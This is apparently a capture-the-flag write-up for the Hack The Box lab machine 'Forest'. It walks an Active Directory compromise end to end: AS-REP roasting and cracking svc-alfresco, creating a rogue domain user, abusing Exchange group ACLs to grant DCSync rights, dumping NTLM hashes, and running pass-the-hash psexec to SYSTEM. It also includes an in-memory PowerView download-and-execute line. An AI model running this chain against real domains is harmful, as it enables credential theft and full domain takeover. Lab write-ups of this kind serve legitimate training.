Forest
NOTES
Starting off with a basic port scan and a full service/script scan with nmap
basic
```shell
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49671/tcp open unknown
49676/tcp open unknown
49677/tcp open unknown
49684/tcp open unknown
49706/tcp open unknown
```
full
```shell
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-26 12:29:09Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-07-26T12:29:12
|_ start_date: 2025-07-26T12:24:08
|_clock-skew: mean: 2h26m47s, deviation: 4h02m30s, median: 6m47s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2025-07-26T05:29:10-07:00
```
SMB anonymous (null session) success, but no shares listed
LDAP anonymous bind success
Note the clock skew nmap reports (median ~7 min): Kerberos rejects timestamps outside a 5 minute window, so sync the clock against the DC before any Kerberos step that sends one (AS-REP roasting itself does not, since no pre-auth timestamp is sent).
ldapsearch
```shell
ldapsearch -x -H ldap://10.10.10.161 -b "DC=htb,DC=local" '(objectClass=person)' sAMAccountName sAMAccountType | grep sAMAccountName
# requesting: sAMAccountName sAMAccountType
sAMAccountName: Guest
sAMAccountName: DefaultAccount
sAMAccountName: FOREST$
sAMAccountName: EXCH01$
sAMAccountName: $331000-VK4ADACQNUCA
sAMAccountName: SM_2c8eef0a09b545acb
sAMAccountName: SM_ca8c2ed5bdab4dc9b
sAMAccountName: SM_75a538d3025e4db9a
sAMAccountName: SM_681f53d4942840e18
sAMAccountName: SM_1b41c9286325456bb
sAMAccountName: SM_9b69f1b9d2cc45549
sAMAccountName: SM_7c96b981967141ebb
sAMAccountName: SM_c75ee099d0a64c91b
sAMAccountName: SM_1ffab36a2f5f479cb
sAMAccountName: HealthMailboxc3d7722
sAMAccountName: HealthMailboxfc9daad
sAMAccountName: HealthMailboxc0a90c9
sAMAccountName: HealthMailbox670628e
sAMAccountName: HealthMailbox968e74d
sAMAccountName: HealthMailbox6ded678
sAMAccountName: HealthMailbox83d6781
sAMAccountName: HealthMailboxfd87238
sAMAccountName: HealthMailboxb01ac64
sAMAccountName: HealthMailbox7108a4e
sAMAccountName: HealthMailbox0659cc1
sAMAccountName: sebastien
sAMAccountName: lucinda
sAMAccountName: andy
sAMAccountName: mark
sAMAccountName: santi
```
enum users (full domain user list; note svc-alfresco and krbtgt, which the anonymous LDAP query above did not return)
```shell
Administrator
Guest
DefaultAccount
krbtgt
$331000-VK4ADACQNUCA
sebastien
lucinda
svc-alfresco
andy
mark
santi
```
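Added example (not from the original notes): a small parser for the LDIF that ldapsearch prints, doing what the grep above does by hand. It drops machine accounts and the Exchange system accounts (SM_*, HealthMailbox*, $331000-...), and flags accounts whose userAccountControl has DONT_REQ_PREAUTH set, which is the same property the LDAP filter (userAccountControl:1.2.840.113556.1.4.803:=4194304) matches. The LDIF below is constructed; the page's query did not request userAccountControl, so the UAC values and the OU of svc-alfresco are assumptions chosen for illustration.

```python
import base64
import re

# Constructed LDIF in the shape ldapsearch prints for the query on this page.
# sAMAccountType and userAccountControl values are ASSUMED for illustration;
# the page's query did not return them, so they are not real htb.local values.
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <DC=htb,DC=local> with scope subtree
# filter: (objectClass=person)

# FOREST, Domain Controllers, htb.local
dn: CN=FOREST,OU=Domain Controllers,DC=htb,DC=local
sAMAccountName: FOREST$
sAMAccountType: 805306369
userAccountControl: 532480

# SM_2c8eef0a09b545acb, Users, htb.local
dn: CN=SM_2c8eef0a09b545acb,CN=Users,DC=htb,DC=local
sAMAccountName: SM_2c8eef0a09b545acb
sAMAccountType: 805306368
userAccountControl: 514

# svc-alfresco, Service Accounts, htb.local
dn: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
sAMAccountName: svc-alfresco
sAMAccountType: 805306368
userAccountControl: 4260352

# sebastien, Users, htb.local
dn: CN=sebastien,CN=Users,DC=htb,DC=local
sAMAccountName: sebastien
sAMAccountType: 805306368
userAccountControl: 66048

# andy, Users, htb.local
dn: CN=andy,CN=Users,DC=htb,DC=local
sAMAccountName:: YW5keQ==
sAMAccountType: 805306368
userAccountControl: 66048
"""

SAM_USER_OBJECT = 805306368          # sAMAccountType: normal user account
SAM_MACHINE_ACCOUNT = 805306369      # sAMAccountType: computer account
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000   # 4194304, the AS-REP roasting flag
EXCHANGE_NOISE = re.compile(r"^(SM_|HealthMailbox|\$)")   # Exchange system accounts
ATTR_LINE = re.compile(r"^([\w;.-]+)(::?) ?(.*)$")


def parse_ldif(text: str) -> list[dict[str, list[str]]]:
    """Parse ldapsearch LDIF into a list of {attribute: [values]} dicts.
    Handles '#' comments, blank-line entry separators, 'attr:: base64'
    values and folded continuation lines (a line starting with one space)."""
    entries, current = [], {}
    for line in re.sub(r"\n ", "", text).splitlines():   # unfold long lines
        if line.startswith("#"):
            continue
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        m = ATTR_LINE.match(line)
        if not m:
            continue
        attr, sep, value = m.groups()
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", "replace")
        current.setdefault(attr, []).append(value)
    if current:
        entries.append(current)
    return entries


def _int_attr(entry: dict, attr: str) -> int:
    return int(entry.get(attr, ["0"])[0])


def candidate_users(entries: list[dict]) -> list[str]:
    """Enabled, non-machine, non-Exchange-system accounts: the list worth
    spraying, Kerberoasting or AS-REP roasting."""
    out = []
    for e in entries:
        name = e.get("sAMAccountName", [""])[0]
        if not name or _int_attr(e, "sAMAccountType") != SAM_USER_OBJECT:
            continue
        if _int_attr(e, "userAccountControl") & UF_ACCOUNTDISABLE or EXCHANGE_NOISE.match(name):
            continue
        out.append(name)
    return out


def asrep_roastable(entries: list[dict]) -> list[str]:
    """Accounts with DONT_REQ_PREAUTH set: the KDC will hand anyone an AS-REP
    encrypted under their key, no password needed."""
    return [e["sAMAccountName"][0] for e in entries
            if _int_attr(e, "userAccountControl") & UF_DONT_REQUIRE_PREAUTH]


if __name__ == "__main__":
    parsed = parse_ldif(SAMPLE_LDIF)
    print("users:", candidate_users(parsed))
    print("AS-REP roastable:", asrep_roastable(parsed))
```

Against a live DC the same two checks can be run server-side: the filter `(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))` returns only the roastable accounts, which is cheaper than pulling every person object and filtering locally.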
AS-REP roasting success: svc-alfresco has Kerberos pre-authentication disabled (DONT_REQ_PREAUTH, 0x400000 in userAccountControl), so the KDC returns an AS-REP encrypted under the account's key to anyone who asks for it (impacket-GetNPUsers with no password). This is a Kerberos weakness, not an LDAP one; anonymous LDAP only helped by supplying the user list.
```shell
$krb5asrep$23$svc-alfresco@HTB.LOCAL:6e67b6e2194aa1e0c3a7702ca046da2c$a369a73f9203ae9bd76bc514a9c7de3429a9011c2250c166f6eb2ba1be74ad49cb69790ede7a8868d043deeb7c2db155a2a820fcb3e2e12919eb6f91ccc7b2f97dafdf35004dfb73b5b8a0aaaba8863eb2127009b5f75ccca6265eb787fb83f60d92cfa54dd308834abaa6a47463f6903f8f4ce963d0529d0c3537a65bdbe7f2449c9198bef259717599718c17a50f9f14c7bc0d6fd7fd83114c8afde46e3298f489a510c3eb072945d070879e0f9222febe06e308f2ccfb12968f01b87943d723e1294bb5a1c2475c3641f67e839c5fa3234d973bd515aa91d07290f35b231ae24147cda7d0
```
```shell
# hash cracked offline (hashcat mode 18200 / john krb5asrep)
svc-alfresco:s3rvice
```
SMB with svc-alfresco success, nothing useful in the shares
WinRM with svc-alfresco success (5985 is open):
```shell
[+] htb.local\svc-alfresco:s3rvice (Pwn3d!)
```
User flag found
Collected BloodHound data with nxc and uploaded it all. Checking the group memberships and outbound object control of svc-alfresco shows this:

SVC-ALFRESCO is a member of Account Operators. Account Operators can create domain accounts and change the membership of non-protected groups, which is what the next two commands rely on.
Let's add ourselves a user:
```shell
C:\> net user 0xnrg Password123 /add /domain
The command completed successfully.
```
Let's check what Account Operators has control over:

Account Operators has GenericAll over Exchange Windows Permissions, and that group has WriteDacl on HTB.LOCAL (the domain object). WriteDacl on the domain lets a member grant itself the replication rights (DS-Replication-Get-Changes / -Get-Changes-All) that DCSync needs.
Let's add our new user to Exchange Windows Permissions:
```shell
net group "Exchange Windows Permissions" /add 0xnrg
The command completed successfully.
net group "Exchange Windows Permissions"
Members
-------------------------------------------------------------------------------
0xnrg
The command completed successfully.
```
Transferred PowerView.ps1 (dev branch) to the target, served from the attack box with pyserv:
```powershell
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.13/PowerView.ps1')
```
Group membership is evaluated at logon, so the existing svc-alfresco session does not carry the new Exchange Windows Permissions membership. Instead, Add-ObjectACL is told to bind as the freshly created 0xnrg and use that group's WriteDacl to grant 0xnrg DCSync rights on the domain:
```powershell
$SecPassword = ConvertTo-SecureString 'Password123' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('HTB\0xnrg', $SecPassword)
Add-ObjectACL -PrincipalIdentity 0xnrg -Credential $Cred -Rights DCSync
```
If the call does not take, name the target explicitly with -TargetIdentity 'DC=htb,DC=local' (Add-ObjectACL is the alias for Add-DomainObjectAcl in the dev branch).
And now the DCSync itself, with secretsdump authenticating as 0xnrg. The RemoteOperations 0x5 (access denied) line is expected and harmless: 0xnrg is not a local admin on the DC, so the SAM/LSA-via-remote-registry path fails, but the DRSUAPI replication path (which is what DCSync is) works because of the ACE just added:
```shell
❯ impacket-secretsdump htb/0xnrg@10.10.10.161
Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies
Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
...SNIP...
```
The Administrator NT hash is enough on its own (pass-the-hash), no cracking needed. psexec uploads a service binary to ADMIN$ and starts it as a service, which is why the shell runs as NT AUTHORITY\SYSTEM rather than as Administrator:
```shell
❯ impacket-psexec administrator@10.10.10.161 -hashes 'aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6'
Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file LlJqRomt.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service AOYM on 10.10.10.161.....
[*] Starting service AOYM.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
```

WEB SERVICE TECHNOLOGY
WEB
NIKTO
WFUZZ / GOBUSTER
FILES
DIRS
SUBDIRS
VHOSTS
Ippsec Notes
Anonymous auth is possible if the server has been upgraded from 2003
SCOPE
| IP | DNS |
|---|---|
| 10.10.10.161 | htb.local |
HOSTS
| HOSTNAME | OS |
|---|---|
| FOREST | Windows 10 / Server 2016 Build 14393 x64 |
USERS
Administrator
Guest
DefaultAccount
krbtgt
sebastien
lucinda
svc-alfresco
andy
mark
santi
CREDENTIALS
svc-alfresco:s3rvice
# Added account
0xnrg:Password123
NMAP
```shell
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49671/tcp open unknown
49676/tcp open unknown
49677/tcp open unknown
49684/tcp open unknown
49706/tcp open unknown
```
SMB SHARES
OTHER NOTES
DCSync chain: svc-alfresco > Account Operators (GenericAll) > Exchange Windows Permissions (WriteDacl) > HTB.LOCAL (grant DCSync) > secretsdump > pass-the-hash as Administrator
PowerView.ps1 dev branch had to be used here (Add-ObjectACL / Add-DomainObjectAcl with -Rights DCSync).